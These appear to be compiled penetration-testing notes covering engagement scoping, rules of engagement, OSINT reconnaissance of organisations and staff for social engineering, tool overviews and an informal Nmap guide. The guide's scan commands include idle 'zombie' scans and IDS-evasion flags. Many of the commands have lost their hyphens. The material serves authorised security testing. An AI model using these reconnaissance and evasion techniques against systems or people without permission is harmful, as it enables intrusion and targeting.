Scoping is specifically tied to what you are going to test. This is very different from covering how you are going to test. We will be covering How To Test in the rules of engagement section. If you are a customer looking for penetration test we strongly recommend going to the General Questions section of this document. It covers the major questions that should be answered before a test begins. Remember, a penetration test should not be confrontational. It should not be an activity to see if the tester can "hack" you. It should be about identifying the business risk associated with and attack. To get maximum value, make sure the questions in this document are covered. Further, as the Scoping activity progresses, a good testing firm will start to ask additional questions tailored to your organization.

How to Scope
One of the key components for scoping an engagement is trying to figure out exactly how you as a tester are going to spend your time. For example, a customer could want you to test 100 IP addresses and only want to pay you $100,000 for the effort. This roughly breaks down to $1K per IP. Now, would that cost structure hold true if they had one mission critical application they wanted you to test? Some testers fall into this trap when interacting with a customer to scope a test. Unfortunately, there is going to be some customer education in the process. We are not WalMart. Our costs are not linear. So, with that being said, there will be some engagements where you will have a wide canvas of IP addresses to test and choose from to try and access a network as part of a test. There will also be highly focused tests where you will spend weeks (if not months) on one specific application. The key is knowing the difference. To have that level of understanding you will have to know what it is the customer is looking for, even when they don't know exactly how to phrase it.

Metrics for Time Estimation


So, now we get to the issue of metrics. Much of this will be based upon your experience in the area you are going to test. For example, have you ever done a full, in-depth test of an application? Have you ever tested a wide range of IP addresses? Go back and review your emails and your scan logs for that engagement. Write that number down somewhere. Now, add at least 20% to the time value. Wait? Why add 20% to the time value? We call this padding. Outside of consultant circles this can sometimes be referred to as consultant overhead. The reason this is required is because every engagement can have small interruptions to the testing. For example, a network segment may go down (hopefully not due to your testing activities). The time spent not testing does in fact cost you the tester money. Another example is meeting creep. There are often times where you will find a tremendous vulnerability in a system and share it with the customer. The customer will then require you to have a meeting with upper management. There should be no doubt that you will attend. However, that meeting will take away from your overall testing time.

What happens if you do not need the 20% overhead? It would be incredibly unethical to simply pocket the cash. Rather, find ways to provide the customer with additional value for the test. Walk the companys security team through the steps you took to exploit the vulnerability, provide an executive summary if it was not part of the original deliverable list, or spend some additional time trying to crack the vulnerability that was elusive during the initial testing. Another component of the metrics of time and testing is that your project has to have a definitive drop dead dates. All good projects have a beginning and an end. Your test should as well. You will need to have a signed Statement of Work specifying the work and the hours required if youve reached the specific date the testing is to end, or if any additional testing or work is requested of you after that date. Some testers have a difficult time doing this because they feel they are being too much of a pain when it comes to cost and hours. However, it has been the experience of the author that if you provide exceptional value for the main test the customer will not balk at paying you for additional work.

Rules of Engagement
While the scope defines what it is you are supposed to test, the rules of engagement defines how testing is to occur. These are two different aspects that need to be handled independently from each other. Timeline You should have a clear timeline for your test. While in scope you defined start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses. However, having a rigid timeline is not the goal of creating a timeline. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work that is to be done and the people that will be responsible for the work. We often use GANTT charts and Work breakdown structure to define the work and the amount of time that each specific section of the work will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated and it helps the customer identify possible roadblocks that many be encountered during testing. There are a number of free GANTT chart tools available on the Internet. find one that works best for you and use it heavily when developing a testing road map. If nothing else, many mangers resonate with these tools and it may be an excellent medium for communicating with the upper management of a target organization.

Locations It is also important to discuss with the customer where the locations are that they will need you to travel to for testing. This could be something as simple as identifying local hotels. And, it may be something as complex as identifying the laws of a specific target country. Sometimes an organization has multiple locations and you will need to identify a few sample locations for testing. In these situations try to avoid having to travel to all customer locations. Many times there are VPN connections available for testing. Disclosure of Sensitive Information While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers, however, there are a number of situations where you do not want the target data on your system. For example, PHI. Under HIPAA this data needs to be protected. In may situations your testing system may not have a firewall or AV running on it. This would be a good situation where you would not want PII anywhere near your computer. So the question becomes how can I prove I had access without getting the data? There are a number of different ways you can prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, you can show the files without showing the content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way you will want to scrub your test machine of results in between tests. This also applies to the report templates you use as well. As a special side note, if you encounter illegal data (i.e. child porn) immediately notify law enforcement, then your customer in that order. Do not notify the customer and take direction from them. Simply viewing child pornography is a crime. Evidence Handling When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports out at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It's very unprofessional to leave references to another organization in your document. Regular Status Meetings Throughout the testing process it is critical to have regular meetings with the customer informing them of the overall progress of the test. These meetings should be held daily and should be as short as possible. We generally see our meetings cover three very simple things: plans, progress and problems.

For plans you should describe what it is you are planning on doing that day. The reason for this is to make sure you will not be testing during a change or an outage. For progress you should inform what you have completed since the previous meeting. For problems you should communicate with the customer any issues that will impact the overall timing of the test. If there are specific people identified to rectify the situation you should not discuss the solution to the problem during the status meeting. Take the conversation offline. The goal of the status meeting is to have a 30 minute or less meeting and take any longer conversations offline with only the specific individuals required to solve the issue. Time of the Day to Test There are better times of the day for testing than others for many customers. Unfortunately, this can mean many late nights for the penetration testers. Be sure that times of testing are clearly communicated with the customer before testing begins. Dealing with Shunning There are times where shunning is perfectly acceptable and there are times where it may not fit the spirit of the test. For example, if your test is to be a full black-box test where you are testing not only the technology, but the capabilities of the target organizations security team, shunning would be perfectly fine. However, when you are testing a large number of systems in coordination with the target organization's security team it may not be in the best interests of the test to shun your attacks. Permission to Test This is quite possibly the single most important document you can receive when testing. This documents the scope and it is where the customer signs off on the fact that they are going to be tested for security vulnerabilities and their systems may be compromised. Further, it should clearly state that testing can lead to system instability and all due care will be given by the tester to not crash systems in the process. However, because testing can lead to instability the customer shall not hold the tester liable for any system instability or crashes. It is critical that testing does not begin until this document is signed by the customer. In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. Legal Considerations Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed.

For example, any VOIP calls captured in the course of the penetration test may be considered wiretapping in some areas.

Capabilities and Technology in Place


Good penetration tests do not simply check for un-patched systems. They also test the capabilities of the target organization. To that end, below is a list of things that you can benchmark while testing.
1. 2. 3. 4. 5. 6. Ability to detect and respond to information gathering Ability to detect and respond to foot printing Ability to detect and respond to scanning and vuln analysis Ability to detect and respond to infiltration (attacks) Ability to detect and respond to data aggregation Ability to detect and respond to data ex-filtration

When tracking this information be sure to collect time information. For example, if a scan is detected you should be notified and note what level of scan you were preforming at the time.

Intelligence Gathering
This section defines the Intelligence Gathering activities of a penetration test. The purpose of this document is to provide a (living?) document designed specifically for the pentester performing reconnaissance against a target (typically corporate, military, or related). The document details the thought process and goals of pentesting reconnaissance, and when used properly, helps the reader to produce a highly strategic plan for attacking a target.
What it is

Intelligence Gathering is performing reconnaissance against a target to gather as much information as possible to be utilized when penetrating the target during the vulnerability assessment and exploitation phases. The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future. Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence.

Why do it

We perform Open Source Intelligence gathering to determine various entry points into an organization. These entry points can be physical, electronic, and/or human. Many companies fail to take into account what information about themselves they place in public and how this information can be used by a determined attacker. On top of that many employees fail to take into account what information they place about themselves in public and how that information can be used to to attack them or their employer.

What is it not

OSINT may not be accurate or timely. The information sources may be deliberately/accidentally manipulated to reflect erroneous data, information may become obsolete as time passes, or simply be incomplete. It does not encompass dumpster-diving or any methods of retrieving company information off of physical items found on-premises.

Target Selection
Identification and Naming of Target

When approaching a target organization it is important to understand that a company may have a number of different Top Level Domains (TDLs) and auxiliary businesses. While this information should have been discovered during the scoping phase it is not all that unusual to identify additional servers domains and companies that may not have been part of the initial scope that was discussed in the pre-engagement phase. For example a company may have a TDL of .com. However, they may also have .net .co and .xxx. These may need to be part of the revised scope, or they may be off limits. Either way it needs to be cleared with the customer before testing begins. It is also not all that uncommon for a company to have a number of sub-companies underneath them. For example General Electric and Proctor and Gamble own a great deal of smaller companies.
Consider any Rules of Engagement limitations

At this point it is a good idea to review the Rules of Engagement. It is common for these to get forgotten during a test. Sometimes, as testers we get so wrapped up in what we find and the possibilities for attack that we forget which IP addresses, domains and networks we can attack. Always, be referencing the Rulles of Engagement to keep your tests focused. This is not just important from a legel perspective, it is also important from a scope creep perspective. Every time you get sidetracked from the core objectives of the test it costs you time. And in the long run that can cost your company money.
Consider time length for test

The amount of time for the total test will directly impact the amount of Intelligence Gathering that can be done. There are some tests where the total time is two to three months. In these engagements a testing company would spend a tremendous amount of time looking into each of the core business units and personal of the company. However, for shorter crystal-box style tests the objectives may be far more tactical. For example, testing a specific web application may not require you to research the financial records of the company CEO.

Consider end goal of the test Consider what you want to accomplish from the Information Gathering phase Make the plan to get it

Open Source Intelligence (OSINT) takes three forms; Passive, Semi-passive, and Active.

Passive Information Gathering: Passive Information Gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform as we are never sending any traffic to the target organization neither from one of our hosts or anonymous hosts or services across the Internet. This means we can only use and gather archived or stored information. As such this information can be out of date or incorrect as we are limited to results gathered from a third party. Semi-passive Information Gathering: The goal for semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information, we arent performing in-depth reverse lookups or brute force DNS requests, we arent searching for unpublished servers or directories. We arent running network level portscans or crawlers and we are only looking at metadata in published documents and files; not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem the target may be able to go back and discover the reconnaissance activities but they shouldnt be able to attribute the activity back to anyone. Active Information Gathering: Active information gathering should be detected by the target and suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans nmap p1-65535), actively enumerating and/or vulnerability scanning the open services, we are actively searching for unpublished directories, files, and servers. Most of this activity falls into your typically reconnaissance or scanning activities for your standard pentest.

Corporate Physical Locations

Per location listing of full address, ownership, associated records (city, tax, legal, etc), Full listing of all physical security measures for the location (camera placements, sensors, fences, guard posts, entry control, gates, type of identification, suppliers entrance, physical locations based on IP blocks/geolocation services, etc

Owner Land/tax records Shared/individual

Timezones Hosts / NOC

Pervasiveness

It is not uncommon for a target organization to have multiple separate physical locations. For example, a bank will have central offices, but they will also have numerous remote branches as well. While physical and technical security may be very good at central locations, remote locations offen have poor security controls.
Relationships

Business partners, customs, suppliers, analysis via whats openly shared on corporate web pages, rental companies, etc. This information can be used to better understand the business or organizational projects. For example, what products and services are critical to the target organization? Also, this information can also be used to create successful social engineering scenarios.

Relationships Shared office space Shared infrastructure Rented / Leased Equipment

Logical

Accumulated information for partners, clients and competitors: For each one, a full listing of the business name, business address, type of relationship, basic financial information, basic hosts/network information.
Business Partners

Targets advertised business partners. Sometimes advertised on main www.

Business Clients

Targets advertised business clients. Sometimes advertised on main www.

Competitors

Who are the targets competitors. This may be simple, Ford vs Chevy, or may require much more analysis.

Touchgraph

A touchgraph (visual representation of the social connections between people) will assist in mapping out the possible interactions between people in the organization, and how to access them from the outside (when a touchgraph includes external communities and is created with a depth level of above 2). The basic touchgraph should reflect the organizational structure derived from the information gathered so far, and further expansion of the graph should be based on it (as it usually represents the focus on the organizational assets better, and make possible approach vectors clear.

Significant company dates


Board meetings Holidays Anniversaries Product/service launch

Professional licenses or registries

Gathering a list of your targets professional licenses and registries may offer an insight into not only how the company operated, but also the guidelines and regulations that they follow in order to maintain those licenses. A prime example of this is a companies ISO standard certification can show that a company follows set guidelines and processes. It is important for a tester to be aware of these processes and how they could affect tests being performed on the organization. A company will often list these details on their website as a badge of honor. In other cases it may be necessary to search registries for the given vertical in order to see if an organization is a member. The information that is available is very dependent on the vertical market, as well as the geographical location of the company. It should also be noted that international companies may be licensed differently and be required to register with different standards or legal bodies dependent on the country.
Org Chart Position identification

Important people in the organization Individuals to specifically target

Document Metadata

What it is? Metadata or meta-content provides information about the data/document in scope. It can have information such as author/creator name, time and date, standards used/referred, location in a computer network (printer/folder/directory path/etc. info), geo-tag etc. For an

image its metadata can contain color, depth, resolution, camera make/type and even the coordinates and location information. Why you would do it? Metadata is important because it contains information about the internal network, user-names, email addresses, printer locations etc. and will help to create a blueprint of the location. It also contains information about software used in creating the respective documents. This can enable an attacker to create a profile and/or perform targeted attacks with internal knowledge on the networks and users. How you would do it? There are tools available to extract the metadata from the file (pdf/word/image) like FOCA (GUI-based), metagoofil (python-based), meta-extractor, exiftool (perl-based). These tools are capable of extracting and displaying the results in different formats as HTML, XML, GUI, JSON etc. The input to these tools is mostly a document downloaded from the public presence of the client and then analyzed to know more about it. Whereas FOCA helps you search documents, download and analyzes all through its GUI interface.

Infrastructure Assets Network blocks owned


Network Blocks owned by the organization can be passively obtained from performing whois searches. DNSStuff.com is a one stop shop for obtaining this type of information. Open Source searches for IP Addresses could yield information about the types of infrastructure at the target. Administrators often post ip address information in the context of help requests on various support sites.

Email addresses

E-mail addresses provide a potential list of valid usernames and domain structure E-mail addresses can be gathered from multiple sources including the organizations website.

External infrastructure profile


The target's external infrastructure profile can provide immense information about the technologies used internally. This information can be gathered from multiple sources both passively and actively. The profile should be utilized in assembling an attack scenario against the external infrastructure.

Technologies used

OSINT searches through support forums, mailing lists and other resources can gather information of technologies used at the target Use of Social engineering against the identified information technology organization Use of social engineering against product vendors

Purchase agreements

Purchase agreements contain information about hardware, software, licenses and additional tangible asset in place at the target.

Remote access

Obtaining information on how employees and/or clients connect into the target for remote access provides a potential point of ingress. Often times link to remote access portal are available off of the target's home page How To documents reveal applications/procedures to connect for remote users

Application usage

Gather a list of known application used by the target organization. This can often be achieved by extracting metadata from publicly accessible files (as discussed previously)
Defense technologies

Fingerprinting defensive technologies in use can be achieved in a number of ways depending on the defenses in use.
Passive fingerprinting

Search forums and publicly accessible information where technicians of the target organisation may be discussing issues or asking for assistance on the technology in use Search marketing information for the target organisation as well as popular technology vendors Using Tin-eye (or another image matching tool) search for the target organisations logo to see if it is listed on vendor reference pages or marketing material

Active fingerprinting

Send appropriate probe packets to the public facing systems to test patterns in blocking. Several tools exist for fingerprinting of specific WAF types. Header information both in responses from the target website and within emails often show information not only on the systems in use, but also the specific protection mechanisms enabled (e.g. Email gateway Anti-virus scanners)

Human capability

Discovering the defensive human capability of a target organization can be difficult. There are several key pieces of information that could assist in judging the security of the target organization.

Check for the presence of a company-wide CERT/CSIRT/PSRT team Check for advertised jobs to see how often a security position is listed

Check for advertised jobs to see if security is listed as a requirement for non-security jobs (e.g. developers) Check for out-sourcing agreements to see if the security of the target has been outsourced partially or in its entirety Check for specific individuals working for the company that may be active in the security community

Financial Reporting

The targets financial reporting will depend heavily on the location of the organization. Reporting may also be made through the organizations head office and not for each branch officeWhat is it: EDGAR (the Electronic Data Gathering, Analysis, and Retrieval system) is a database of the U.S. Security and Exchanges Commission (SEC) that contains registration statements, periodic reports, and other information of all companies (both foreign and domestic) who are required by law to file.

Why do it: EDGAR data is important because, in additional to financial information, it identifies key personnel within a company that may not be otherwise notable from a companys website or other public presence. It also includes statements of executive compensation, names and addresses of major common stock owners, a summary of legal proceedings against the company, economic risk factors, and other potentially interesting data.

2.2 Pentest

Tools

OpenVAS
OpenVAS is a vulnerability scanner that was forked from the last free version of Nessus after that tool went proprietary in 2005. OpenVAS plugins are still written in the Nessus NASL language. The project seemed dead for a while, but development has restarted

Core Impact
Core Impact isn't cheap (be prepared to spend at least $30,000), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. Other good options include Metasploit and Canvas.

Nexpose
Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. It is sold as standalone software, an appliance, virtual machine, or as a managed

service or private cloud deployment. User interaction is through a web browser. There is a free "community edition" for scanning up to 32 IPs, as well as Express ($3,000 per user per year), Express Pro ($7,000 per user per year) and Enterprise (starts at $25,000 per user per year) editions.

GFI LanGuard
GFI LanGuard is a network security and vulnerability scanner designed to help with patch management, network and software audits, and vulnerability assessments. The price is based on the number of IP addresses you wish to scan. A free trial version (up to 5 IP addresses) is available.

QualysGuard
QualysGuard is a popular SaaS (software as a service) vulnerability management offering. It's web-based UI offers network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Internal scans are handled by Qualys appliances which communicate back to the cloud-based systemLatest

MBSA
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week.

Secunia PSI
Secunia PSI (Personal Software Inspector) is a free security tool designed to detect vulnerable and out-dated programs and plug-ins that expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus programs. Secunia PSI checks only the machine it is running on, while its commercial sibling Secunia CSI (Corporate Software Inspector) scans multiple machines on a network.

Nipper
Nipper (short for Network Infrastructure Parser, previously known as CiscoParse) audits the security of network devices such as switches, routers, and firewalls. It works by parsing and analyzing device configuration file which the Nipper user must supply. This was an open source tool until its developer (Titania) released a commercial .

SAINT
SAINT is a commercial vulnerability assessment tool. Like Nessus, it used to be free and open source but is now a commercial product. Unlike Nexpose, and QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of the few scanner vendors that don't support (run on) Windows at all.

Nessus
Nessus is an automatic vulnerability scanner that can detect most known vulnerabilities, such as misconfiguration, default passwords, unpatched services, etc. Pros and Cons of Nessus Pros a. Free vulnerability scanning. b. Check for effectiveness of patching Cons c. Some GUI isues still arises d. Less open than it was e. Definitely appears hostile when used Nessus vs Retina - Vulnerability Scanning Tools Evaluation The Test Environment The tested vulnerability scanning tools were installed on a Windows 7 Pro PC. The Scanning Process Both scanners were started with setting on full port scan, with disabled safety of scanning, and all available plugins were activated. NOTE: Since Retina does not have WebApplication Analysis, Nessus was run twice, once with WebApplications disabled, and once with WebApplication enabled in order to do a meaningful performance comparison. Performance

The Nessus scanner without WebApplication scan took 8 minutes to complete the scan The Nessus scanner with WebApplication scan took 67 minutes to complete the scan The Retina scanner took 38 minutes to complete the scan

Results

Both scanners failed to identify the target operating system The Nessus scanner identified the expected open ports, concluded that MySQL does not accept connections from unauthorized IP's. On a repeat scan, it regenerated the same results. The Retina scanner identified HTTP and TCP port 631 (IPP Printer Sharing). It did not identify the MySQL port as open. On the Web server, it identified a significant number of vulnerabilites, but did not collect any information from the HTTP server. On a repeat scan it missed the HTTP port and only identified the MySQL port. The Nessus Scanner running the WebApplication Scanning repeated the previous results and additionally it identified a significant number of WebApp vulnerabilites, and collected information from HTTP through web mirroring.

Conclusions Both scanners performed a very well vulnerability identification but missed the OS identification. Also, both manifested flaws: 1. Nessus missed the IPP port every time 2. Retina manifested erroneous scan results, identifying different ports and vulnerabilities during different sessions - while no configuration changes were made to the test environment. In terms of speed, without WebApplication Scan Nessus performed much faster then Retina. On the other hand, with active WebApplication Scan, Nessus was much slower then Retina. In terms of scan depth, Nessus has a small advantage, since it includes a web mirroring tool that is very helpful in HTTP. It can be clearly concluded that these tools cannot be used as the sole source of information when performing a vulnerability test. One must also utilize network mapping (NMAP, LanGuard), OS identification (NMAP) and specific application vulnerability scanners (ParosProxy, WebScarab for Web) for maximum effect. In a direct comparison, Nessus wins because 1. Retina manifested erroneous results on repeat scans, 2. The Nessus package includes a WebApplication scanning module, which in eEye products needs to be purchased as a separate application

NMAP
NMAP is primarily a host detection and port discovery tool. Instead of using Nessus to look for specific vulnerabilities against a known quantity of hosts, NMAP discovers active IP hosts using a combination of probes. Once a network scan is done, you can have NMAP look at specific hosts for open ports. NMAP can also attempt to gather additional information about the open ports such as finding out the version of a database running on one of your servers, but its bread

and butter is really the host detection and port scanning.One huge benefit of NMAPs open source roots is that it includes a scripting engine that allows users to create complex NMAP scripts. Scripts are broken into several categories including Auth (attempts to brute force attack authentication), discovery, intrusive and malware (which looks for malware infected machines)

Pros and Cons of NMAP Pros1. 2. 3. 4. Fastest , much reliable O.S and application version info Accepts IP address ranges , lists, file formats Front end available for command line inhabited

Cons1. Scanning may be considered hostile 2. SYN scanshave been known to crash some systems

A Simple Guide to Nmap Usage :What is Nmap? its short For Network Mapper. It is a free port scanner, released under GNU GPL. Written by Fyodor and with contributions from around the world. It is simple fast and very effective port scanners. It has gone under lots of changes and it is certainly the best one with more and more features added. Recent Addtion is Version Scanning which is very crusial against networks. It is the Port Scanner OF Choice. Infact Administrator's, Hackers Crackers, Script Kiddies and many more use it well it is released under GPL and was first written on linux. And a bit shocking thing about is that even microsoft has included it in its auditing tools list and recommends using nmap for scans. But a great tihng about Nmap is that lots of people have also put effort to port it to other platforms like Windows, BSD, MAC OS and it is sucessful so you can run it on any platform. It supports many types of scans and diferent types of flags are used and results are also very brief and easy to interpret. Infact Its a Port Scanner Of Choice.

Nmap Supports Different Types Of Scans, Enumerated Below :-

TCP Connect Scan : This is the simplest form of scanning. It connects to every open
port on the target machine and lists the open ports, the idea behind this kind of scanning is simple if the port on the target machine is open and accepting connections the Connect() will succed and if the port is not listening it is considered as closed. For every unix user with less priviliges this is the default scanning option. It can be very usefull as it is fast as parellel scanning option can be used with TCP connect Scan. But this type of scanning has its own demerits like it can be easily detected and filtered, it also shows up lots of connection logs. An example of this is :-

#nmap sT 192.168.0.1 TCP SYN Scan : This type of scanning is also called as half open scanning, as a full TCP connection is not made to the target port on target machine. In this type of Scan first a SYN packet is send to the port which indicates the port as if a real connection is going to be established and if the port is open and listening it sends back a SYN|ACK which is the indication that the port is open and if we get the RST back with means that the port is not listening and it is closed and if we get SYN|ACK back we immediately send a RST packet back which closes down the connection. This type of scanning has an advantage that only a few systems monitor and log this type pof scan attempts. And a Demerit of this scanning technique is that you need to be root to form SYN packets. An example of this is :#nmap sS 192.168.0.1 TCP FIN Xmus and Null scans : Sometimes when it is not just enough to use SYN scans as it can be detected by packet filters when SYN packets are send to unlikely ports. And thats why FIN and Xmus and Null all these scans are able to by pass these type of filtering, in the technique when FIN packet is send to a open port the open port ignores the packet and a closed port immidiately send back a RST packet which tells nmap which port is open and which is close, But this type of scanning has its own merits and demerits as it is not effective against Microsoft Platform, and infact when ever a FIN packet is send to any port it replys with RST, but this can be used to discover that this system is Microsoft Based. An example of this is :-

#nmap sF 192.168.0.1 #nmap sX 192.168.0.1 #nmap sN 192.168.0.1

<= This is FIN Scan <= This is Xmus Scan <= This is Null Scan.

Ping Scan : It is sometimes when you want to know which of the systems are up, and this is the most likely scan method to be used to determine systems which are up. This is done by sending ICMP echo packets to all the hosts specified and all those hosts that respond to these packets are up. But sometimes ICMP echo packets are blocked and so it fails in picking up systems that are alive. But infact our nmap is much more smarter in this respect and has a option which send TCP Ack packet to the target system by default this port is set to 80, and if the system responds with a RST packet, this is an indication that the system is up and the third technique is a SYN packet is send and awating a RST or SYN | Ack packet which indicates the system is up. An example of this is :-

#nmap sP 192.168.0.1-255 #nmap PT80 192.168.0.1

<= Ping Scan <= TCP Ping Scan.

UDP Scan : This type of Scanning is used to determine which UDP ports are open on the target host. In this type of scanning 0 byte udp packet it send to all the specified ports on the taget machine and if we get ICMP unreacheable then the port is assumed to be closed or else it is considered as open. But to its demerit is that sometimes ISPs often block these ports and so it sometimes throws incorrect results that the ports are open but infact it is not, so you need to be a bit more fortunate about these results. An example of this is :#nmap sU 192.168.0.1 Version Detection Scan : Recent Addition to Nmap is version detection, which determines the service running and the version number of the daemon running. It is really very useful as it shows up the versions and which can show the old and vulnerable daemons and this is where vulnerability scanners are used but nmap has done it by just Version detection technique, if you are really an nmap geek I doubt you need vulnerability scanners, in this type of scan a service fingerprint is made from the daemon which is compared to nmaps database of fingerprints and when it matchs it is sure that what service is running.

An example of this is :-

#nmap sV 192.168.0.1 Protocol Scan : This technique is used to know which IP protocols are supported on the targer host. This is done by sending raw ip packets to the host without any header of protocol and it is send to all the protocols on the target host.nmap probes for 256 protocol types and it is infact time consuming but it is useful somewhere or the other. An example of this is :#nmap sO 192.168.0.1 Ack Scan : This type of Scanning is used to map out firewall rulesets.It can detemine that the firewall is stateful or just a packe filter that blocks incoming SYN packets. In this type of scan an Ack packet is send to the port and if it replies with an RST it means it is unfiltered and it is open and if no reply is returned it is classified as filtered. An example of this is :-

#nmap sA 192.168.0.1 List Scan : This used to generate a list of IP addresses with out actually pinging or scanning them and also a DNS resolution is performed in this type of scan. An example of this is :#nmap sL yahoo.com RPC Scan : This type of scan uses a number of portscanning techniques, it finds all the TCP and UDP ports found and floods them with SunRPC program with Null commands to determine if it is a RPC service or not, it also catches up version number also. An example for this is :#nmap sR 192.168.0.1 Idle Scan : This type of scan is truly blind Scan. Which means that no packet is send from your own ip address. Instead another host is used which is often called as a Zombie with is used to scan the target machine and determine the open ports on the target machine, this is done by predecting the sequence numbers of the zombie host and used that host to scan our target, and if the target machine checks the ip of the scanning party the ip of the Zombie machine will show up. But it is best suited to use this technique at late nights when the zombie is idle to get the best results. There is a very nice paper written on Idle scanning, you can get it from securityfocus, I dont remember the link but u can search for it, and there is also an exclusive paper on idle scanning with nmap which u can get at insecure.org This type of scan also helps us to map out the trust releationship between hosts. With is crucial for Spoofing attacks. An example of this is :#nmap sI zombie.yahoo.com mail.yahoo.com Window Scan : This type of scan is very similar to Ack Scanning. It is use to map out open closed ports, filtered unfiltered ports due to anomaly in TCP window size reporting by each different operating system. Majority of *Nix Operating systems are vulnerable. An example of this is :#nmap sW 192.168.0.1 Different Types of Flags used in Scanning :-P0 :- If this flag is used it is an indication that Pinging the host is prohibited and during scanning the host Pinging is disabled. This is useful in many cases as some of the servers ignore icmp echo requests, so the host is scanned without discovering it with ping. With this TCP Ack Scan can also be used here like this PT80.

-PT :- This flag is used to determine which hosts are up. This is used when icmp echo reply packets are blocked. A TCP Ack packet is send to the target network and if the host replys with RST it is up or else it is down.

-PS :- This flag is uses SYN packets instead of Ack packets, but its limitations for packet constructing is only for root users. All the hosts that respond with RST or SYN|ACK the hosts are up and if nothing, then its assumed to be down.

-O :- This flag is used to identify the target operating system. This is done by comparing the already stored fingerprint database of nmap with that of the fingerprints genreated by the host. This technique also calculates the uptime of the computer, and also used to determine the TCP Sequence predectability -f :- This flag is used to evade intrusion detection systems and packet filtering systems and by pass all the scans with SYN , FIN , NULL, XMUS options. Packets are broken into tiny packets which are hard to be detected by IDS and Packet filters to detect.

-v :- This flag indicates verbose output. It means that it will print all information whats going on during the scan, And it can used to times to get more information.

-p :- This flag is used specify the custom port numbers you want to scan.different ports can be seperated using commas, ,. An example for this is :#nmap sT p 21,23,80,139,6000 192.168.0.1 -F :This flag is used for Fast scanning. When this flag is used the only ports specified in the nmap services file will be scanned. And this is what makes the scan very fast. -M :parallel scanning. This flag is used to specify maximum number of sockets to be used for

-T :This flag is used to specify the timing policy for the scan. This type of scanning can be used to evade Intrusion detection systems and it can also be used to make the Intrusion detection systems to start shouting :D. There are 5 options of timings.

Paranoid Sneaky Polite Normal Aggressive Insane

:- This type is very slow and is very handy to evade IDS. :- This is a bit similar but waits only 15 seconds between sending packets. :- This type helps to ease the load on the network. :- This type of scanning is the normal scanning behavior. :- This type is used to make the scan a bit more fast. :- This type is the most quickest scan, I triggers IDSs.

Examples Of Scanning :-

#nmap sS -v 192.168.0.1 #nmap sT v 192.168.0.1 #nmap sS sV -v 192.168.0.1 #nmap sT sV v 192.168.0.1 #nmap sT sV v P0 192.168.0.1 #nmap sP v 192.168.0.1-255 #nmap PT80 vv 192.168.0.1-255 #nmap sF vv 192.168.0.1 #nmap sO sV 192.168.0.1 #nmap sI P0 zombie.myhost.com yourhost.com #nmap sT sV p 21,23,79,80 192.168.0.1 #nmap sT sV T Paranoid 192.168.0.1 #nmap sT P0 T Insane M10 192.168.0.1

#nmap sT T5 M1000 192.168.0.1

Metasploit
Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less). The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. Pros and Cons of Metasploit Pros a. Growing community of users. b. Growing documentations c. Excellent tools to identify and exploit vulnerability Cons a. b. c. d. Do not expect all exploits may be upto date with latest exploits Lack of logging or reports Machine running Metasploit can be compromised It can be dangerous tool and may violate policy at our organization.

Aircrack
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11

packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

BackTrack
This excellent bootable live CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc.

John the Ripper


